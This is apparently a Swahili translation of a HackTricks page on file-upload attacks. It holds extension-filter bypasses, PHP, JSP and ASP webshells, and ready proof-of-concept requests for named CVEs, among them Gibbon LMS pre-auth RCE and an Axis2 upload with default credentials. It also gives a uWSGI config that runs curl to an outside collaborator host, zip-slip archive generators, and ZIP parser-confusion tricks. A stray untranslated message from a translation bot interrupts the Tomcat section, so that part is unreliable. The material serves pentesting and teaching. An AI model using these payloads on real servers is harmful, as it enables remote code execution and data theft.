Upakiaji Faili

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Mbinu Za Jumla za Upakiaji Faili

Extensions nyingine muhimu:

  • PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
  • Working in PHPv8: .php, .php4, .php5, .phtml_, .module_, .inc_, .hphp_, .ctp_
  • ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
  • Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
  • Coldfusion: .cfm, .cfml, .cfc, .dbm
  • Flash: .swf
  • Perl: .pl, .cgi
  • Erlang Yaws Web Server: .yaws

Kupitisha ukaguzi wa extensions za faili

  1. Kama zinatumika, angalia extensions zilizotajwa hapo juu. Pia zijaribu kwa kutumia herufi kubwa: pHp, .pHP5, .PhAr …
  2. Angalia kuongeza extension halali kabla ya extension ya utekelezaji (tumia extensions zilizotajwa hapo juu pia):
  • file.png.php
  • file.png.Php5
  1. Jaribu kuongeza tabia maalum mwishoni. Unaweza kutumia Burp kufanya bruteforce kwa characters zote za ascii na Unicode. (Kumbuka pia unaweza kujaribu kutumia extensions zilizotajwa awali)
  • file.php%20
  • file.php%0a
  • file.php%00
  • file.php%0d%0a
  • file.php/
  • file.php.\
  • file.
  • file.php….
  • file.pHp5….
  1. Jaribu kupita walinzi kwa kudanganya parser ya extension upande wa server kwa mbinu kama kurudia extension au kuongeza data ya taka (null bytes) kati ya extensions. Unaweza pia kutumia extensions zilizotajwa hapo juu kuandaa payload bora.
  • file.png.php
  • file.png.pHp5
  • file.php#.png
  • file.php%00.png
  • file.php\x00.png
  • file.php%0a.png
  • file.php%0d%0a.png
  • file.phpJunk123png
  1. Ongeza ngazi nyingine ya extensions kwa ukaguzi uliotangulia:
  • file.png.jpg.php
  • file.php%00.png%00.jpg
  1. Jaribu kuweka exec extension kabla ya extension halali na kuwaombea server iwe misconfigured. (inafaa kutumika kutekeleza Apache misconfigurations ambapo chochote chenye extension .php, lakini sio lazima kinamalize kwa .php, kitatenda code):
  • ex: file.php.png
  1. Kutumia NTFS alternate data stream (ADS) kwenye Windows. Katika kesi hii, alama ya kolon “:” itaingizwa baada ya extension iliyozuiwa na kabla ya ile inayoruhusiwa. Matokeo yake, faili tupu yenye extension iliyozuiwa itaundwa kwenye server (mf. “file.asax:.jpg”). Faili hii inaweza kuhaririwa baadaye kwa kutumia mbinu nyingine kama kutumia short filename yake. Muundo wa “::$data” pia unaweza kutumika kuunda faili zisizo tupu. Kwa hiyo, kuongeza nukta baada ya muundo huu pia inaweza kusaidia kupita vikwazo zaidi (mf. “file.asp::$data.”)
  2. Jaribu kuvunja mipaka ya jina la faili. Extension halali ina katikati. Na PHP mbaya inabaki. AAA<–SNIP–>AAA.php
# Linux maximum 255 bytes
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # minus 4 here and adding .png
# Upload the file and check response how many characters it alllows. Let's say 236
python -c 'print "A" * 232'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# Make the payload
AAA<--SNIP 232 A-->AAA.php.png

UniSharp Laravel Filemanager pre-2.9.1 (.php. trailing dot) – CVE-2024-21546

Baadhi ya upload handlers hupanua au ku-normalize nukta za mwisho (trailing dot) kutoka kwa jina la faili lililo hifadhiwa. Katika UniSharp’s Laravel Filemanager (unisharp/laravel-filemanager) matoleo kabla ya 2.9.1, unaweza kupitisha ukaguzi wa extension kwa:

  • Kutumia MIME ya picha halali na magic header (mf., PNG’s \x89PNG\r\n\x1a\n).
  • Kumtaja faili iliyopakuliwa na extension ya PHP ikifuatiwa na nukta, mf., shell.php..
  • Server hutolewa nukta ya mwisho na kuendelea kuhifadhi shell.php, ambayo itaendesha ikiwa imewekwa katika directory inayotumika kuhudumia wavuti (public storage ya default kama /storage/files/).

PoC ya Msingi (Burp Repeater):

POST /profile/avatar HTTP/1.1
Host: target
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="upload"; filename="0xdf.php."
Content-Type: image/png

\x89PNG\r\n\x1a\n<?php system($_GET['cmd']??'id'); ?>
------WebKitFormBoundary--

Kisha fikia njia iliyohifadhiwa (kawaida katika Laravel + LFM):

GET /storage/files/0xdf.php?cmd=id

Kupita kando ya Content-Type, Magic Number, Compression & Resizing

  • Kupita kando ya ukaguzi wa Content-Type kwa kuweka value ya Content-Type header kuwa: image/png , text/plain , application/octet-stream
  1. Content-Type wordlist: https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt
  • Kupita kando ya ukaguzi wa magic number kwa kuongeza mwanzoni wa faili baiti za picha halisi (kuhadaa amri ya file). Au weka shell ndani ya metadata:
    exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
    \ au unaweza pia kuingiza payload moja kwa moja katika picha:
    echo '<?php system($_REQUEST['cmd']); ?>' >> img.png
  • Ikiwa compression zinaongezwa kwenye picha yako, kwa mfano kwa kutumia maktaba za kawaida za PHP kama PHP-GD, mbinu za hapo juu hazitafaa. Walakini, unaweza kutumia PLTE chunk technique defined here kuingiza maandishi yatakay stahimili compression.
  • Github na code
  • Tovuti pia inaweza kuwa inafanya resizing ya image, kwa mfano kwa kutumia vitendo vya PHP-GD imagecopyresized au imagecopyresampled. Hata hivyo, unaweza kutumia IDAT chunk technique defined here kuingiza baadhi ya maandishi yatakay stahimili compression.
  • Github na code
  • Mbinu nyingine ya kutengeneza payload itakay stahimili image resizing, ikitumia kazi ya PHP-GD thumbnailImage. Hata hivyo, unaweza kutumia tEXt chunk technique defined here kuingiza maandishi yatakay stahimili compression.
  • Github na code

Mbinu Nyingine za Kuangalia

  • Tafuta udhaifu unaoruhusu rename ya faili iliyopakuliwa (kubadilisha extension).
  • Tafuta udhaifu wa Local File Inclusion ili kuendesha backdoor.
  • Ufichaji wa Taarifa Unaoweza Kutokea:
  1. Pakia mara nyingi (na kwa wakati mmoja) faili ileile zenye jina moja
  2. Pakia faili yenye jina la faili au folda ambayo tayari ipo
  3. Kupakia faili yenye “.” , “..”, au “…” kama jina lake. Kwa mfano, katika Apache kwenye Windows, ikiwa application inaweka yaliyopakuliwa kwenye saraka “/www/uploads/”, jina la faili “.” litasababisha kuundwa kwa faili inayoitwa uploads” katika saraka “/www/”.
  4. Pakia faili ambayo inaweza isiyeondolewa kirahisi kama “…:.jpg” kwenye NTFS. (Windows)
  5. Pakia faili kwenye Windows yenye herufi zisizokubalika kama |<>*?” katika jina lake. (Windows)
  6. Pakia faili kwenye Windows ukitumia majina yanayohifadhiwa (yataambuliwa) kama CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, na LPT9.
  • Jaribu pia kupakia executable (.exe) au .html (inayoonekana si hatari) ambayo itaendesha code inapofunguliwa kwa bahati mbaya na mwathirika.

Special extension tricks

Ikiwa unajaribu kupakia faili kwenye PHP server, angalia mbinu ya .htaccess ya kuendesha code.
Ikiwa unajaribu kupakia faili kwenye ASP server, angalia mbinu ya .config ya kuendesha code.

Faili za .phar ni kama .jar kwa java, lakini kwa php, na zinaweza kutumika kama faili ya php (kuziendesha na php, au kuzijumuisha ndani ya script…)

Kiendelezi .inc wakati mwingine hutumika kwa faili za php ambazo zinatumika tu kwa kuingiza faili, kwa hivyo, wakati fulani, mtu anaweza kuwa ameruhusu kiendelezi hiki kiendeshwe.

Jetty RCE

Ikiwa unaweza kupakia faili ya XML kwenye Jetty server unaweza kupata RCE because **new .xml and .war are automatically processed. Hivyo, kama ilivyoelezwa kwenye picha ifuatayo, pakia faili ya XML kwenye $JETTY_BASE/webapps/ na tarajia shell!

https://twitter.com/ptswarm/status/1555184661751648256/photo/1

uWSGI RCE

Kwa uchunguzi wa kina wa udhaifu huu angalia utafiti wa asili: uWSGI RCE Exploitation.

Remote Command Execution (RCE) vulnerabilities can be exploited in uWSGI servers if one has the capability to modify the .ini configuration file. uWSGI configuration files leverage a specific syntax to incorporate “magic” variables, placeholders, and operators. Notably, the ‘@’ operator, utilized as @(filename), is designed to include the contents of a file. Among the various supported schemes in uWSGI, the “exec” scheme is particularly potent, allowing the reading of data from a process’s standard output. This feature can be manipulated for nefarious purposes such as Remote Command Execution or Arbitrary File Write/Read when a .ini configuration file is processed.

Consider the following example of a harmful uwsgi.ini file, showcasing various schemes:

[uwsgi]
; read from a symbol
foo = @(sym://uwsgi_funny_function)
; read from binary appended data
bar = @(data://[REDACTED])
; read from http
test = @(http://[REDACTED])
; read from a file descriptor
content = @(fd://[REDACTED])
; read from a process stdout
body = @(exec://whoami)
; curl to exfil via collaborator
extra = @(exec://curl http://collaborator-unique-host.oastify.com)
; call a function returning a char *
characters = @(call://uwsgi_func)

Utekelezaji wa payload hutokea wakati wa parsing ya configuration file. Ili configuration ianze kufanya kazi na ichakatwe, mchakato wa uWSGI lazima uzinduliwe upya (huenda baada ya crash au kutokana na shambulio la Denial of Service) au faili iwe imewekwa kwa auto-reload. Kipengele cha auto-reload, ikiwa kimewezeshwa, hurudisha faili kwa vipindi vilivyobainishwa baada ya kugundua mabadiliko.

Ni muhimu kuelewa asili ya upungufu katika parsing ya configuration file ya uWSGI. Mahususi, payload inayojadiliwa inaweza kuingizwa ndani ya binary file (kama image au PDF), ikipanua zaidi wigo wa uwezekano wa exploitation.

Gibbon LMS arbitrary file write to pre-auth RCE (CVE-2023-45878)

Endpoint isiyothibitishwa katika Gibbon LMS inaruhusu kuandika faili kwa hiari ndani ya web root, na kusababisha pre-auth RCE kwa kuangusha PHP file. Toleo zilizoathirika: hadi na ikijumuisha 25.0.01.

  • Endpoint: /Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php
  • Method: POST
  • Required params:
  • img: data-URI-like string: [mime];[name],[base64] (seva inapuuzilia mbali type/name, ina-base64-decodes sehemu ya mwisho)
  • path: destination filename relative to Gibbon install dir (e.g., poc.php or 0xdf.php)
  • gibbonPersonID: any non-empty value is accepted (e.g., 0000000001)

PoC ndogo kabisa ya kuandika na kusoma faili:

# Prepare test payload
printf '0xdf was here!' | base64
# => MHhkZiB3YXMgaGVyZSEK

# Write poc.php via unauth POST
curl http://target/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php \
-d 'img=image/png;test,MHhkZiB3YXMgaGVyZSEK&path=poc.php&gibbonPersonID=0000000001'

# Verify write
curl http://target/Gibbon-LMS/poc.php

Weka webshell ndogo na tekeleza commands:

# '<?php system($_GET["cmd"]); ?>' base64
# PD9waHAgIHN5c3RlbSgkX0dFVFsiY21kIl0pOyA/Pg==

curl http://target/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php \
-d 'img=image/png;foo,PD9waHAgIHN5c3RlbSgkX0dFVFsiY21kIl0pOyA/Pg==&path=shell.php&gibbonPersonID=0000000001'

curl 'http://target/Gibbon-LMS/shell.php?cmd=whoami'

Maelezo:

  • Handler inafanya base64_decode($_POST["img"]) baada ya kugawanywa kwa ; na ,, kisha inaandika bytes kwenye $absolutePath . '/' . $_POST['path'] bila kuhakiki extension/type.
  • Msimbo uliotokana unaendeshwa kama web service user (kwa mfano, XAMPP Apache on Windows).

Marejeleo ya bug hili ni pamoja na usd HeroLab advisory na NVD entry. Angalia sehemu ya References hapa chini.

wget File Upload/SSRF Trick

Wakati mwingine unaweza kugundua kwamba server inatumia wget kupakua faili na unaweza onyesha URL. Katika kesi hizi, msimbo unaweza kukagua kwamba extension ya faili zilizopakuliwa iko kwenye whitelist ili kuhakikisha kwamba ni faili tu zinazoruhusiwa zitatapakuliwa. Hata hivyo, ukaguzi huu unaweza kupitishwa.
Urefu wa juu kabisa wa jina la faili katika linux ni 255, hata hivyo, wget hukata majina ya faili hadi 236 characters. Unaweza kupakua faili iitwayo “A”*232+“.php”+“.gif”; jina hili la faili litaepuka ukaguzi (kama katika mfano huu “.gif” ni extension inayokubaliwa) lakini wget itabadilisha jina la faili kuwa “A”*232+“.php”.

#Create file and HTTP server
echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
python3 -m http.server 9080

#Download the file
wget 127.0.0.1:9080/$(python -c 'print("A"*(236-4)+".php"+".gif")')
The name is too long, 240 chars total.
Trying to shorten...
New name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.
--2020-06-13 03:14:06--  http://127.0.0.1:9080/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
Connecting to 127.0.0.1:9080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10 [image/gif]
Saving to: ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’

AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[===============================================>]      10  --.-KB/s    in 0s

2020-06-13 03:14:06 (1.96 MB/s) - ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’ saved [10/10]

Tambua kwamba chaguo jingine unaloweza kufikiria ili kuipita ukaguzi huu ni kufanya HTTP server redirect to a different file, hivyo URL ya awali itaipita ukaguzi huo, lakini wget itapakua file iliyorejeshwa na jina jipya. Hii haitafanya kazi isipokuwa wget inatumiwa na parameter --trust-server-names kwa sababu wget itapakua ukurasa uliorejeshwa kwa jina la file lililodokezwa kwenye original URL.

Kutoroka upload directory kwa kutumia NTFS junctions (Windows)

(Kwa shambulio hili utahitaji ufikiaji wa ndani kwenye mashine ya Windows) Wakati uploads zinapohifadhiwa chini ya per-user subfolders kwenye Windows (mfano, C:\Windows\Tasks\Uploads<id>) na wewe unadhibiti uundaji/ufutaji wa subfolder hiyo, unaweza kuibadilisha na directory junction inayolenga mahali nyeti (mfano, webroot). Uploads zinazofuata zitaandikwa katika target path, kuruhusu execution ya code ikiwa target inatafsiri server‑side code.

Mfano wa mtiririko wa kupeleka uploads kwenye XAMPP webroot:

:: 1) Upload once to learn/confirm your per-user folder name (e.g., md5 of form fields)
::    Observe it on disk: C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882

:: 2) Remove the created folder and create a junction to webroot
rmdir C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882
cmd /c mklink /J C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882 C:\xampp\htdocs

:: 3) Re-upload your payload; it lands under C:\xampp\htdocs
::    Minimal PHP webshell for testing
::    <?php echo shell_exec($_REQUEST['cmd']); ?>

:: 4) Trigger
curl "http://TARGET/shell.php?cmd=whoami"

Vidokezo

  • mklink /J creates an NTFS directory junction (reparse point). Akaunti ya web server lazima ifuate junction na kuwa na write permission kwenye destination.
  • Hii ina-redirect arbitrary file writes; ikiwa destination inaendesha scripts (PHP/ASP), hii inakuwa RCE.
  • Defenses: usiruhusu writable upload roots ziwe attacker‑controllable chini ya C:\Windows\Tasks au sawa; zuia junction creation; validate extensions server‑side; hifadhi uploads kwenye volume tofauti au kwa deny‑execute ACLs.

GZIP-compressed body upload + path traversal in destination param → JSP webshell RCE (Tomcat)

Baadhi ya upload/ingest handlers huandika raw request body kwenye filesystem path ambayo imetengenezwa kutoka kwa user-controlled query parameters. Ikiwa handler pia inaunga mkono Content-Encoding: gzip na inashindwa canonicalize/validate destination path, unaweza kuchanganya directory traversal na gzipped payload kuandika arbitrary bytes ndani ya web-served directory na kupata RCE (kwa mfano, drop a JSP under Tomcat’s webapps).

Generic exploitation flow:

  • Andaa payload ya server-side (e.g., minimal JSP webshell) na gzip-compress the bytes.
  • Tuma POST ambapo path parameter (e.g., token) ina directory traversal inayotoroka folder iliyokusudiwa, na file inaonyesha jina la faili la kuhifadhi. Weka Content-Type: application/octet-stream na Content-Encoding: gzip; body ni compressed payload.
  • Tembelea faili iliyowekwa ili kusababisha execution.

Illustrative request:

POST /fileupload?token=..%2f..%2f..%2f..%2fopt%2ftomcat%2fwebapps%2fROOT%2Fjsp%2F&file=shell.jsp HTTP/1.1
Host: target
Content-Type: application/octet-stream
Content-Encoding: gzip
Content-Length: <len>

<gzip-compressed-bytes-of-your-jsp>

I need the actual README.md content to translate. Please paste the file content (or the text portion you want translated), and I will return the Swahili translation preserving all markdown/html tags, links and paths.

GET /jsp/shell.jsp?cmd=id HTTP/1.1
Host: target

Notes

  • Njia za lengo zinatofautiana kulingana na usakinishaji (kwa mfano, /opt/TRUfusion/web/tomcat/webapps/trufusionPortal/jsp/ katika baadhi ya stacks). Folda yoyote iliyofunguliwa kwenye wavuti inayotekeleza JSP itafanya kazi.
  • Burp Suite’s Hackvertor extension inaweza kutengeneza gzip body sahihi kutoka kwa payload yako.
  • Hii ni pattern safi ya pre-auth arbitrary file write → RCE; haiitegemei multipart parsing.

Mitigations

  • Amua maeneo ya upload upande wa server; usiamini kamwe vipande vya path kutoka kwa wateja.
  • Fanya canonicalize na udhibiti kwamba path iliyotatuliwa inabaki ndani ya saraka ya msingi iliyoorodheshwa.
  • Hifadhi uploads kwenye volume isiyotekelezwa (non-executable) na kata utekelezaji wa script kutoka kwa path zinazoweza kuandikwa.

Axis2 SOAP uploadFile traversal to Tomcat webroot (JSP drop)

Huduma za upload zenye msingi wa Axis2 wakati mwingine zinaonyesha kitendo cha SOAP uploadFile kinachochukua sehemu tatu zinazodhibitiwa na mshambuliaji: jobDirectory (destination directory), archiveName (filename), na dataHandler (base64 file content). Ikiwa jobDirectory haijafanya canonicalized, unaweza kupata uwezo wa kuandika faili yoyote kupitia path traversal na kuweka JSP kwenye webapps za Tomcat.

Minimal request outline (default creds often work: admin / trubiquity):

POST /services/WsPortalV6UpDwAxis2Impl HTTP/1.1
Host: 127.0.0.1
Content-Type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:updw="http://updw.webservice.ddxPortalV6.ddxv6.procaess.com">
<soapenv:Body>
<updw:uploadFile>
<updw:login>admin</updw:login>
<updw:password>trubiquity</updw:password>
<updw:archiveName>shell.jsp</updw:archiveName>
<updw:jobDirectory>/../../../../opt/TRUfusion/web/tomcat/webapps/trufusionPortal/jsp/</updw:jobDirectory>
<updw:dataHandler>PD8lQCBwYWdlIGltcG9ydD0iamF2YS5pby4qIjsgc3lzdGVtKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSk7Pz4=</updw:dataHandler>
</updw:uploadFile>
</soapenv:Body>
</soapenv:Envelope>
  • Bindings mara nyingi huwa localhost-tu; zipangilie na full-read SSRF (absolute-URL request line, Host header ignored) ili kufikia 127.0.0.1 ikiwa port ya Axis2 haikutolewa.
  • Baada ya kuandika, vinjari /trufusionPortal/jsp/shell.jsp?cmd=id ili kutekeleza.

Vifaa

  • Upload Bypass ni zana yenye nguvu iliyoundwa kusaidia Pentesters na Bug Hunters kupima file upload mechanisms. Inatumia mbinu mbalimbali za bug bounty ili kurahisisha mchakato wa kutambua na kutumia vulnerabilities, kuhakikisha tathmini ya kina ya web applications.

Corrupting upload indices with snprintf quirks (historical)

Baadhi ya legacy upload handlers zinazotumia snprintf() au sawa ili kujenga multi-file arrays kutoka single-file upload zinaweza kudanganywa kutengeneza muundo wa _FILES. Kutokana na kutokuridhika na ukataji katika tabia ya snprintf(), upload moja iliyotengenezwa kwa uangalifu inaweza kuonekana kama mafaili mengi yaliyo na index upande wa server, ikachanganya mantiki inayodhani muundo muafaka (kwa mfano, kuitumia kama multi-file upload na kuchukua matawi hatarishi). Ingawa ni nadra leo, muundo huu wa “index corruption” mara kwa mara hurudi kwenye CTFs na codebases za zamani.

From File upload to other vulnerabilities

Hapa kuna orodha ya juu 10 ya vitu unavyoweza kufanikisha kwa kupakia (kutoka here):

  1. ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
  2. SVG: Stored XSS / SSRF / XXE
  3. GIF: Stored XSS / SSRF
  4. CSV: CSV injection
  5. XML: XXE
  6. AVI: LFI / SSRF
  7. HTML / JS : HTML injection / XSS / Open redirect
  8. PNG / JPEG: Pixel flood attack (DoS)
  9. ZIP: RCE via LFI / DoS
  10. PDF / PPTX: SSRF / BLIND XXE

Burp Extension

GitHub - PortSwigger/upload-scanner: HTTP file upload scanner for Burp Proxy \xc2\xb7 GitHub

Magic Header Bytes

  • PNG: "\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\x s0\x03["
  • JPG: "\xff\xd8\xff"

Rejelea https://en.wikipedia.org/wiki/List_of_file_signatures kwa filetypes nyingine.

Zip/Tar File Automatically decompressed Upload

Ikiwa unaweza kupakia ZIP ambayo itafunguliwa ndani ya server, unaweza kufanya mambo 2:

Pakia link lenye soft links kwa mafaili mengine; kisha kwa kufikia mafaili yaliyofunguliwa utaweza kufikia mafaili yaliyofungamana:

ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
tar -cvf test.tar symindex.txt

Decompress in different folders

Kuundwa kwa faili isiyotarajiwa katika directories wakati wa decompression ni tatizo kubwa. Licha ya dhana za awali kwamba usanidi huu ungeweza kulinda dhidi ya OS-level command execution kupitia malicious file uploads, msaada wa hierarchical compression na uwezo wa directory traversal wa ZIP archive format unaweza kutumika vibaya. Hii inawawezesha attackers kupita vikwazo na kutoroka secure upload directories kwa kudanganya decompression functionality ya targeted application.

Automated exploit ya kutengeneza faili za aina hiyo inapatikana kwenye evilarc on GitHub. Zana inaweza kutumika kama inavyoonyeshwa:

# Listing available options
python2 evilarc.py -h
# Creating a malicious archive
python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php

Aidha, symlink trick with evilarc ni chaguo. Ikiwa lengo ni kulenga faili kama /flag.txt, symlink ya faili hiyo inapaswa kuundwa kwenye mfumo wako. Hii inahakikisha kwamba evilarc isikumbane na makosa wakati wa utekelezaji wake.

Hapo chini ni mfano wa Python code inayotumika kuunda malicious zip file:

#!/usr/bin/python
import zipfile
from io import BytesIO


def create_zip():
f = BytesIO()
z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
z.writestr('../../../../../var/www/html/webserver/shell.php', '<?php echo system($_REQUEST["cmd"]); ?>')
z.writestr('otherfile.xml', 'Content of the file')
z.close()
zip = open('poc.zip','wb')
zip.write(f.getvalue())
zip.close()

create_zip()

Kutumia compression vibaya kwa file spraying

Kwa maelezo zaidi angalia chapisho la asili katika: https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/

  1. Creating a PHP Shell: Nambari ya PHP imeandikwa ili kutekeleza amri zinazopitishwa kupitia $_REQUEST variable.
<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
system($cmd);
}?>
  1. File Spraying and Compressed File Creation: Faili kadhaa zimetengenezwa na archive ya zip imekusanywa ikiwa na faili hizi.
root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# zip cmd.zip xx*.php
  1. Modification with a Hex Editor or vi: Majina ya faili ndani ya zip yanabadilishwa kwa kutumia vi au hex editor, kubadilisha “xxA” kuwa “../” ili kupita katika directories.
:set modifiable
:%s/xxA/../g
:x!

ZIP NUL-byte filename smuggling (PHP ZipArchive confusion)

Wakati backend inathibitisha ZIP entries kwa kutumia PHP’s ZipArchive lakini extraction inaandika kwenye filesystem ikitumia majina ya raw, unaweza kuficha extension isiyoruhusiwa kwa kuweka NUL (0x00) katika fields za jina la faili. ZipArchive hutumia jina la entry kama C‑string na hukata kwenye NUL ya kwanza; filesystem inaandika jina kamili, ikiacha kila kitu baada ya NUL.

High-level flow:

  • Andaa legitimate container file (kwa mfano, valid PDF) ambalo limejumuisha tiny PHP stub kwenye stream ili magic/MIME iendelee kuwa PDF.
  • Iite kama shell.php..pdf, zip it, kisha hex‑edit ZIP local header na central directory filename ili kubadilisha dot ya kwanza (.) baada ya .php kuwa 0x00, ikitoa shell.php\x00.pdf.
  • Validators zinazotegemea ZipArchive zita “ona” shell.php .pdf na kuruhusu; extractor itaandika shell.php kwenye disk, ikisababisha RCE ikiwa upload folder ina uwezo wa kutekeleza.

Hatua ndogo za PoC:

# 1) Build a polyglot PDF containing a tiny webshell (still a valid PDF)
printf '%s' "%PDF-1.3\n1 0 obj<<>>stream\n<?php system($_REQUEST["cmd"]); ?>\nendstream\nendobj\n%%EOF" > embedded.pdf

# 2) Trick name and zip
cp embedded.pdf shell.php..pdf
zip null.zip shell.php..pdf

# 3) Hex-edit both the local header and central directory filename fields
#    Replace the dot right after ".php" with 00 (NUL) => shell.php\x00.pdf
#    Tools: hexcurse, bless, bvi, wxHexEditor, etc.

# 4) Local validation behavior
php -r '$z=new ZipArchive; $z->open("null.zip"); echo $z->getNameIndex(0),"\n";'
# -> shows truncated at NUL (looks like ".pdf" suffix)

Vidokezo

  • Badilisha occurrences zote mbili za jina la faili (local na central directory). Baadhi ya zana huongeza entry ya ziada ya data descriptor pia – rekebisha all name fields ikiwa zipo.
  • Faili ya payload inapaswa bado kupita server‑side magic/MIME sniffing. Kuingiza PHP kwenye PDF stream kunahakikisha header inabaki halali.
  • Inafanya kazi pale ambapo enum/validation path na extraction/write path hazikubaliani juu ya jinsi ya kushughulikia strings.

ZIPs zilizounganishwa (parser disagreement)

Kuunganisha (concatenating) ZIP files mbili halali kunazalisha blob ambapo parsers tofauti zinazingatia rekodi tofauti za EOCD. Zana nyingi zinatafuta End Of Central Directory (EOCD) ya mwisho, wakati maktaba nyingine (mf., ZipArchive katika specific workflows) zinaweza kuchanganua archive ya kwanza wanayokutana nayo. Ikiwa validation inorodhesha archive ya kwanza na extraction inatumia chombo kingine kinachoheshimu EOCD ya mwisho, archive isiyo hatari inaweza kupita ukaguzi wakati archive mbaya inachukuliwa.

PoC:

# Build two separate archives
printf test > t1; printf test2 > t2
zip zip1.zip t1; zip zip2.zip t2

# Stack them
cat zip1.zip zip2.zip > combo.zip

# Different views
unzip -l combo.zip   # warns about extra bytes; often lists entries from the last archive
php -r '$z=new ZipArchive; $z->open("combo.zip"); for($i=0;$i<$z->numFiles;$i++) echo $z->getNameIndex($i),"\n";'

Mfano wa matumizi mabaya

  • Tengeneza archive isiyo hatari (aina inayoruhusiwa, kwa mfano, PDF) na archive ya pili inayojumuisha extension iliyozuiwa (kwa mfano, shell.php).
  • Unganisha yao: cat benign.zip evil.zip > combined.zip.
  • Ikiwa seva inathibitisha kwa parser mmoja (inaona benign.zip) lakini hutoa kwa parser mwingine (inashughulikia evil.zip), faili iliyozuiwa itaingia katika njia ya uondoaji.

ImageTragic

Pakia yaliyomo haya kwa extension ya picha ili kutumia udhaifu (ImageMagick , 7.0.1-1) (kutoka kwa exploit)

push graphic-context
viewbox 0 0 640 480
